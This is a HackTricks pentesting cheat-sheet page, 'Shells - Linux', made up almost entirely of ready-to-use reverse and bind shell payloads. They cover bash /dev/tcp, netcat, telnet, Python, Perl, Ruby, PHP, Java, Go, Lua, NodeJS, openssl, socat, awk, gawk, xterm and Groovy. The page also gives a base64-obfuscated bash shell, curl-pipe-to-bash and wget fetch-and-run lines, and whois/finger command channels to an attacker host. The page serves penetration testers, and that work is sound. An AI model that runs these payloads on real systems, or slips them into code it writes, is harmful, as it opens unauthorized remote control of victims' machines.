HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
Shells - Linux
Support HackTricks and get benefits!
If you have questions about any of these shells you could check them with https://explainshell.com/โ€‹

Full TTY

Once you get a reverse shell read this page to obtain a full TTY.

Bash | sh

1
curl https://reverse-shell.sh/1.1.1.1:3000 | bash
2
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
3
sh -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
4
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
5
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
6
#Short and bypass (cretdits to Dikline)
7
(sh)0>/dev/tcp/10.10.10.10/9091
8
#after getting the previous shell, to get the output execute
9
exec >&0
Copied!
Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash

Symbol safe shell

1
#If you need a more stable connection do:
2
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
3
โ€‹
4
#Stealthier method
5
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
6
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
Copied!

Create in file and execute

1
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
2
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
Copied!

Forward Shell

You might find cases where you have a RCE in a web app in a, Linux machine but due to Iptables rules or other kind of filtering you cannot get a reverse shell. This "shell" allows you to maintain a PTY shell through that RCE using pipes inside the victim system. You can find the code in https://github.com/IppSec/forward-shellโ€‹
You just need to modify:
  • The URL of the vulnerable host
  • The prefix and suffix of your payload (if any)
  • The way the payload is sent (headers? data? extra info?)
Then, you can just send commands or even use the upgrade command to get a full PTY (note that pipes are read and written with an approximate 1.3s delay).

Netcat

1
nc -e /bin/sh <ATTACKER-IP> <PORT>
2
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
3
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
4
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
5
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
Copied!

Telnet

1
telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
2
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
3
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
4
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
Copied!

Whois

Attacker
1
while true; do nc -l <port>; done
Copied!
To send the command write it down, press enter and press CTRL+D (to stop STDIN)
Victim
1
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
Copied!

Python

1
#Linux
2
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
3
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
4
#IPv6
5
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
Copied!

Perl

1
perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
2
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Copied!

Ruby

1
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
2
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Copied!

PHP

1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
2
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
Copied!

Java

1
r = Runtime.getRuntime()
2
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
3
p.waitFor()
Copied!

Ncat

1
victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
2
attacker> ncat -v 10.0.0.22 4444 --ssl
Copied!

Golang

1
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
Copied!

Lua

1
#Linux
2
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
3
#Windows & Linux
4
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
Copied!

NodeJS

1
(function(){
2
var net = require("net"),
3
cp = require("child_process"),
4
sh = cp.spawn("/bin/sh", []);
5
var client = new net.Socket();
6
client.connect(8080, "10.17.26.64", function(){
7
client.pipe(sh.stdin);
8
sh.stdout.pipe(client);
9
sh.stderr.pipe(client);
10
});
11
return /a/; // Prevents the Node.js application form crashing
12
})();
13
โ€‹
14
โ€‹
15
or
16
โ€‹
17
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
18
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")
19
โ€‹
20
or
21
โ€‹
22
-var x = global.process.mainModule.require
23
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
24
โ€‹
25
or
26
โ€‹
27
// If you get to the constructor of a function you can define and execute another function inside a string
28
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
29
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
30
โ€‹
31
โ€‹
32
or
33
โ€‹
34
// Abuse this syntax to get a reverse shell
35
var fs = this.process.binding('fs');
36
var fs = process.binding('fs');
37
โ€‹
38
or
39
โ€‹
40
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
Copied!

OpenSSH

Attacker (Kali)
1
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
2
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
3
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
Copied!
Victim
1
#Linux
2
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
3
โ€‹
4
#Windows
5
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
Copied!

Socat

Bind shell

1
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
2
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
Copied!

Reverse shell

1
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
2
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
Copied!

Awk

1
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Copied!

Finger

Attacker
1
while true; do nc -l 79; done
Copied!
To send the command write it down, press enter and press CTRL+D (to stop STDIN)
Victim
1
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done
2
โ€‹
3
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
Copied!

Gawk

1
#!/usr/bin/gawk -f
2
โ€‹
3
BEGIN {
4
Port = 8080
5
Prompt = "bkd> "
6
โ€‹
7
Service = "/inet/tcp/" Port "/0/0"
8
while (1) {
9
do {
10
printf Prompt |& Service
11
Service |& getline cmd
12
if (cmd) {
13
while ((cmd |& getline) > 0)
14
print $0 |& Service
15
close(cmd)
16
}
17
} while (cmd != "exit")
18
close(Service)
19
}
20
}
Copied!

Xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
1
xterm -display 10.0.0.1:1
Copied!
To catch the incoming xterm, start an X-Server (:1 โ€“ which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
1
Xnest :1
Copied!
Youโ€™ll need to authorise the target to connect to you (command also run on your host):
1
xhost +targetip
Copied!

Groovy

by frohoff NOTE: Java reverse shell also work for Groovy
1
String host="localhost";
2
int port=8044;
3
String cmd="cmd.exe";
4
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Copied!

Bibliography

Reverse Shell Cheat Sheet
Reverse Shell Cheat Sheet
pentestmonkey
Using Whois and Finger for Reverse Shells
PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master ยท swisskyrepo/PayloadsAllTheThings
GitHub
Support HackTricks and get benefits!